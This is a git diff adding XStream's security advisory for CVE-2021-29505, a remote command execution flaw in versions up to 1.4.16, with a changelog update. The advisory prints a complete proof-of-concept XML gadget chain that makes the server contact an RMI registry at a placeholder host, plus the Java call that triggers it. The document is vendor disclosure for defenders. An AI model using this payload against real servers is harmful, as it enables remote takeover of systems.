diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html new file mode 100644 index 000000000..378eab8b6 --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-29505.html @@ -0,0 +1,119 @@ + + +
+CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.
+ +All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is + affected, who followed the recommendation to setup XStream's security + framework with a whitelist limited to the minimal required types.
+ +The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of a local command on the server.
+ +Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and + unmarshal it again with XStream:
+<java.util.PriorityQueue serialization='custom'> + <unserializable-parents/> + <java.util.PriorityQueue> + <default> + <size>2</size> + </default> + <int>3</int> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>12345</type> + <value class='com.sun.org.apache.xpath.internal.objects.XString'> + <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>12345</type> + <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> + <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> + <parsedMessage>true</parsedMessage> + <soapVersion>SOAP_11</soapVersion> + <bodyParts/> + <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <attachmentsInitialized>false</attachmentsInitialized> + <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <soapPart/> + <mm> + <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> + <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> + <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> + <names> + <string>aa</string> + <string>aa</string> + </names> + <ctx> + <environment/> + <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> + <java.rmi.server.RemoteObject> + <string>UnicastRef</string> + <string>ip2</string> + <int>1099</int> + <long>0</long> + <int>0</int> + <short>0</short> + <boolean>false</boolean> + </java.rmi.server.RemoteObject> + </registry> + <host>ip2</host> + <port>1099</port> + </ctx> + </candidates> + </aliases> + </it> + </mm> + </multiPart> + </sm> + </message> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + </java.util.PriorityQueue> +</java.util.PriorityQueue> +
XStream xstream = new XStream(); +xstream.fromXML(xml); +
As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.
+ +Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.
+ +The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by + manipulating the processed input stream.
+ +See workarounds for the different versions covering all CVEs.
+ +V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.
+ + + diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html index 19a8e2172..4cfe0f5a2 100644 --- a/xstream-distribution/src/content/changes.html +++ b/xstream-distribution/src/content/changes.html @@ -101,11 +101,26 @@This maintenance release addresses the security vulnerability + CVE-2021-29505, when unmarshalling with XStream instances using an uninitialized + security framework.
+ +CVE | Description | |
---|---|---|
Version 1.4.16 | ++ | + |
CVE-2021-29505 | +XStream is vulnerable to a Remote Command Execution attack. | +|
Version 1.4.15 | @@ -393,8 +402,11 @@ |